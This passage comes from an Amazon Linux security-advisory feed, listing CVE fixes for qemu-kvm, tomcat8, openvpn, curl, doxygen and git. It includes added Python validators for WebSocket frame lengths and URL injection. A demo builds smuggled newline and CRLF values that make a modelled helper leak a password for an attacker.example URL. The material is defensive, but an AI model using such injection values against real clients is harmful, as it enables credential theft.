epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.50.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-tools-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.26.amzn1.i686.rpm</filename></package><package 
name="python35-libs" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-libs-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.11-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1408</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1408: important priority package update for qemu-kvm</title><issued date="2020-07-27 23:58:00" /><updated date="2020-07-29 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8608:
In libslirp 4.1.0, as used in QEMU 4.2.0, tcp_subr.c misuses snprintf return values, leading to a buffer overflow in later code.
1798453: CVE-2020-8608 QEMU: Slirp: potential OOB access due to unsafe snprintf() usages
CVE-2020-7039:
tcp_emu in tcp_subr.c in libslirp 4.1.0, as used in QEMU 4.2.0, mismanages memory, as demonstrated by IRC DCC commands in EMU_IRC. This can cause a heap-based buffer overflow or other out-of-bounds access which can lead to a DoS or potentially arbitrary code execution.
1791551: CVE-2020-7039 QEMU: slirp: OOB buffer access while emulating tcp protocols in tcp_emu()
CVE-2019-9824:
tcp_emu in slirp/tcp_subr.c (aka slirp/src/tcp_subr.c) in QEMU 3.0.0 uses uninitialized data in an snprintf call, leading to information disclosure.
1678515: CVE-2019-9824 QEMU: slirp: information leakage in tcp_emu() due to uninitialized stack variables
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9824" title="" id="CVE-2019-9824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7039" title="" id="CVE-2020-7039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8608" title="" id="CVE-2020-8608" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1409</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1409: important priority package update for tomcat8</title><issued date="2020-07-27 23:58:00" /><updated date="2020-07-29 21:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13935:
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.
1857024: CVE-2020-13935 tomcat: multiple requests with invalid payload length in a WebSocket frame could lead to DoS
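CVE-2020-13935 above concerns a frame whose payload-length field is not validated before it is used. As an added example (the editor's own code, not Tomcat's), the parser below decodes the RFC 6455 frame header and refuses the length encodings the RFC forbids: a 16-bit length that should have used the 7-bit form, a 64-bit length below 65536, and a 64-bit length with its most significant bit set. build_header() exists only so the test can construct those frames; the frames and mask key are constructed here.

```python
import struct


class FrameError(ValueError):
    """Raised for any header the RFC forbids; the connection should be
    closed with status 1002 (protocol error) rather than retried."""


def _need(buf, n):
    # Header incomplete: the caller must read more before parsing again.
    if n > len(buf):
        raise FrameError('truncated header: need %d bytes, have %d' % (n, len(buf)))


def parse_frame_header(buf, require_mask=True):
    """Decode an RFC 6455 frame header from the start of buf and return a
    dict with fin, opcode, masked, payload_len, mask_key and header_len.
    Every length check happens here, before a single payload byte is read,
    so a bad length can never reach the code that loops over the payload."""
    _need(buf, 2)
    b0, b1 = buf[0], buf[1]
    fin = b0 >> 7
    rsv = (b0 >> 4) % 8          # RSV1-RSV3
    opcode = b0 % 16
    masked = b1 >> 7
    len7 = b1 % 128              # low 7 bits: 0-125 literal, 126 or 127 extended
    pos = 2
    if rsv:
        raise FrameError('RSV bits set without a negotiated extension')
    if require_mask and not masked:
        # Section 5.1: every client-to-server frame must be masked.
        raise FrameError('unmasked frame from client')
    if opcode >= 8 and (not fin or len7 > 125):
        # Control frames must be unfragmented and at most 125 bytes.
        raise FrameError('control frame fragmented or longer than 125 bytes')
    if len7 == 126:
        _need(buf, pos + 2)
        (payload_len,) = struct.unpack('>H', buf[pos:pos + 2])
        pos += 2
        if 126 > payload_len:
            # Section 5.2: the minimal encoding is mandatory.
            raise FrameError('16-bit length %d must use the 7-bit form' % payload_len)
    elif len7 == 127:
        _need(buf, pos + 8)
        (payload_len,) = struct.unpack('>Q', buf[pos:pos + 8])
        pos += 8
        if payload_len >> 63:
            # Section 5.2: the most significant bit must be 0. Stored in a
            # signed 64-bit integer this value is negative, and a check that
            # only compares against a maximum size would wave it through.
            raise FrameError('64-bit length has its most significant bit set')
        if 65536 > payload_len:
            raise FrameError('64-bit length %d must use the 16-bit form' % payload_len)
    else:
        payload_len = len7
    mask_key = None
    if masked:
        _need(buf, pos + 4)
        mask_key = bytes(buf[pos:pos + 4])
        pos += 4
    return {'fin': fin, 'opcode': opcode, 'masked': masked,
            'payload_len': payload_len, 'mask_key': mask_key, 'header_len': pos}


def build_header(opcode, payload_len, fin=1, mask_key=None, length_form=None):
    """Encode a header. length_form (7, 16 or 64) overrides the minimal
    encoding so a test can build the frames a hostile peer would send."""
    form = length_form
    if form is None:
        form = 7 if 126 > payload_len else (16 if 65536 > payload_len else 64)
    b0 = fin * 128 + opcode
    mask_bit = 128 if mask_key else 0
    if form == 7:
        out = bytes([b0, mask_bit + payload_len])
    elif form == 16:
        out = bytes([b0, mask_bit + 126]) + struct.pack('>H', payload_len)
    else:
        out = bytes([b0, mask_bit + 127]) + struct.pack('>Q', payload_len)
    return out + (mask_key or b'')


def rejects(buf, require_mask=False):
    """True if parse_frame_header refuses buf."""
    try:
        parse_frame_header(buf, require_mask)
    except FrameError:
        return True
    return False
```

A server should additionally cap payload_len at its configured maximum message size before allocating or looping; that limit is deployment policy and is deliberately not built into the parser.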
CVE-2020-13934:
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.
1857040: CVE-2020-13934 tomcat: OutOfMemoryException caused by HTTP/2 connection leak could lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13934" title="" id="CVE-2020-13934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13935" title="" id="CVE-2020-13935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-jsp-2.3-api" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.57-1.85.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1410</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1410: medium priority package update for openvpn</title><issued date="2020-07-28 03:26:00" /><updated date="2020-07-29 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11810:
This security issue is quite hard to abuse, requiring a fairly precise timing attack combined with guessing a just assigned peer-id reference. If successful, only a single client just initiating a new connection will experience a denial of service situation. This is why the severity is rated low.
1169925: CVE-2020-11810 openvpn: race condition between allocating peer-id and initializing data channel key
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11810" title="" id="CVE-2020-11810" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.4.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.9-1.23.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.9-1.23.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.9-1.23.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.9-1.23.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.9-1.23.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.9-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1411</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1411: medium priority package update for curl</title><issued date="2020-07-28 17:21:00" /><updated date="2020-07-29 21:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8177:
curl 7.20.0 through 7.70.0 can be tricked by a malicious server into overwriting a local file when -J (--remote-header-name) and -i (--include) are used on the same command line. -J saves the response under the file name given in the server's Content-Disposition header and normally refuses to overwrite an existing file of that name in the current directory; when -i was also given, curl skipped that check and overwrote the file. Fixed in curl 7.71.0.
1847915: CVE-2020-8177 curl: command line arguments lead to local file overwrite
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8177" title="" id="CVE-2020-8177" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.94.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.94.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.94.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.94.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1412</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1412: low priority package update for doxygen</title><issued date="2020-07-28 17:22:00" /><updated date="2020-07-29 21:30:00" /><severity>low</severity><description>Package updates are available for Amazon 
Linux AMI that fix the following vulnerabilities:
CVE-2016-10245:
Insufficient sanitization of the query parameter in templates/html/search_opensearch.php could lead to reflected cross-site scripting or iframe injection.
1714190: CVE-2016-10245 doxygen: cross-site scripting in templates/html/search_opensearch.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10245" title="" id="CVE-2016-10245" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="doxygen-debuginfo" version="1.8.5" release="4.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/doxygen-debuginfo-1.8.5-4.14.amzn1.x86_64.rpm</filename></package><package name="doxygen" version="1.8.5" release="4.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/doxygen-1.8.5-4.14.amzn1.x86_64.rpm</filename></package><package name="doxygen-latex" version="1.8.5" release="4.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/doxygen-latex-1.8.5-4.14.amzn1.x86_64.rpm</filename></package><package name="doxygen-debuginfo" version="1.8.5" release="4.14.amzn1" epoch="1" arch="i686"><filename>Packages/doxygen-debuginfo-1.8.5-4.14.amzn1.i686.rpm</filename></package><package name="doxygen-latex" version="1.8.5" release="4.14.amzn1" epoch="1" arch="i686"><filename>Packages/doxygen-latex-1.8.5-4.14.amzn1.i686.rpm</filename></package><package name="doxygen" version="1.8.5" release="4.14.amzn1" epoch="1" arch="i686"><filename>Packages/doxygen-1.8.5-4.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1413</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1413: important priority package update for git</title><issued date="2020-07-28 17:23:00" /><updated date="2020-07-29 21:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-5260:
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.
1822020: CVE-2020-5260 git: Crafted URL containing new lines can cause credential leak
CVE-2020-11008:
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. This bug is similar to CVE-2020-5260 (GHSA-qm7j-c969-7j4q). The fix for that bug still left the door open for an exploit where _some_ credential is leaked (but the attacker cannot control which one). Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that are considered illegal as of the recently published Git versions can cause Git to send a "blank" pattern to helpers, missing hostname and protocol fields. Many helpers will interpret this as matching _any_ URL, and will return some unspecified stored password, leaking the password to an attacker's server. The vulnerability can be triggered by feeding a malicious URL to `git clone`. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The root of the problem is in Git itself, which should not be feeding blank input to helpers. However, the ability to exploit the vulnerability in practice depends on which helpers are in use.
Credential helpers which are known to trigger the vulnerability:
- Git's "store" helper
- Git's "cache" helper
- the "osxkeychain" helper that ships in Git's "contrib" directory
Credential helpers which are known to be safe even with vulnerable versions of Git:
- Git Credential Manager for Windows
Any helper not in this list should be assumed to trigger the vulnerability.
1826001: CVE-2020-11008 git: Crafted URL containing new lines, empty host or lacks a scheme can cause credential leak
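The two git issues above and CVE-2019-18348 in ALAS-2020-1407 share one shape: a URL component is accepted unchecked, or percent-decoded, and then written into a line-oriented protocol (the HTTP request head; git's key=value credential-helper stream), where an embedded CR/LF ends the line early and whatever follows is read as the next line. As an added example that is not part of these advisories, of CPython or of git, the serializers below are the editor's own and apply the checks those fixes describe: control characters (the class CPython's http.client uses, [\x00-\x20\x7f]) are refused in the host before a request head is built, and a newline or NUL, a missing scheme or an empty host are refused before a credential request is written. store_helper_get() models a git-credential-store style matcher so the leak is visible end to end; the URLs and the stored credential are constructed here.

```python
import re
from urllib.parse import unquote


class UnsafeURL(ValueError):
    pass


# Control characters, space and DEL: the class CPython's http.client refuses
# in a request target and, since the CVE-2019-18348 fix, in the host as well.
CTL_RE = re.compile(r'[\x00-\x20\x7f]')


def split_url(url):
    """Minimal scheme://[user@]host/path splitter that neither strips nor
    decodes anything, so exactly what the caller passed reaches the
    serializers below. Returns (scheme, user, host, path)."""
    scheme, sep, rest = url.partition('://')
    if not sep:
        scheme, rest = '', url
    authority, _, path = rest.partition('/')
    user, _, host = authority.rpartition('@')
    return scheme, user, host, '/' + path


def http_request_head(url, validate_host=True):
    """Request head that urlopen-style code emits for a GET. With
    validate_host=False it behaves as before the fix: a host carrying CR/LF
    is copied straight into the Host line and whatever follows the CR/LF is
    sent as additional header lines the caller never wrote."""
    _, _, host, target = split_url(url)
    if validate_host and CTL_RE.search(host):
        raise UnsafeURL('host contains control characters: %r' % host)
    if CTL_RE.search(target):
        raise UnsafeURL('request target contains control characters: %r' % target)
    head = 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (target, host)
    return head.encode('latin-1')


def credential_request(url, strict=True):
    """The key=value block git feeds a credential helper for url: protocol,
    host and, if present, username lines, ended by a blank line. Like git,
    a component that is unset is simply not written. strict=True applies
    the two fixes: no newline or NUL in any percent-decoded value
    (CVE-2020-5260), and a scheme must be present and the host non-empty
    (CVE-2020-11008)."""
    scheme, user, host, _ = split_url(url)
    fields = (('protocol', scheme), ('host', unquote(host)), ('username', unquote(user)))
    if strict:
        if not scheme:
            raise UnsafeURL('URL has no scheme')
        if not fields[1][1]:
            raise UnsafeURL('URL has an empty host')
        for key, value in fields:
            if '\n' in value or '\0' in value:
                raise UnsafeURL('%s would end a helper line early: %r' % (key, value))
    return ''.join('%s=%s\n' % kv for kv in fields if kv[1]) + '\n'


def store_helper_get(request, store):
    """Matching rule of a git-credential-store style helper: each key the
    request supplies must equal the stored entry's value, a repeated key
    overwrites the earlier one, and a key the request omits matches
    anything. store is a list of dicts (constructed for the demo). Returns
    (username, password) or None."""
    query = {}
    for line in request.split('\n'):
        key, sep, value = line.partition('=')
        if sep:
            query[key] = value
    for entry in store:
        if all(entry.get(k) == v for k, v in query.items()):
            return entry['username'], entry['password']
    return None


def rejects(fn, *args, **kwargs):
    """True if fn raises UnsafeURL for these arguments."""
    try:
        fn(*args, **kwargs)
    except UnsafeURL:
        return True
    return False


if __name__ == '__main__':
    store = [{'protocol': 'https', 'host': 'good.example.com',
              'username': 'alice', 'password': 's3cret'}]
    # Encoded newline in the host: the helper is asked for good.example.com's
    # password while the connection itself goes to attacker.example.
    inj = 'https://attacker.example%0ahost=good.example.com/repo.git'
    print(store_helper_get(credential_request(inj, strict=False), store))
    print(rejects(credential_request, inj))
    # Empty host: a blank pattern the helper treats as match-anything.
    print(store_helper_get(credential_request('https:///repo.git', strict=False), store))
    print(http_request_head('http://example.com\r\nX-Injected: 1/', validate_host=False))
```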
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11008" title="" id="CVE-2020-11008" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5260" title="" id="CVE-2020-5260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-svn" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.18.4" release="2.71.amzn1" epoch="0" 
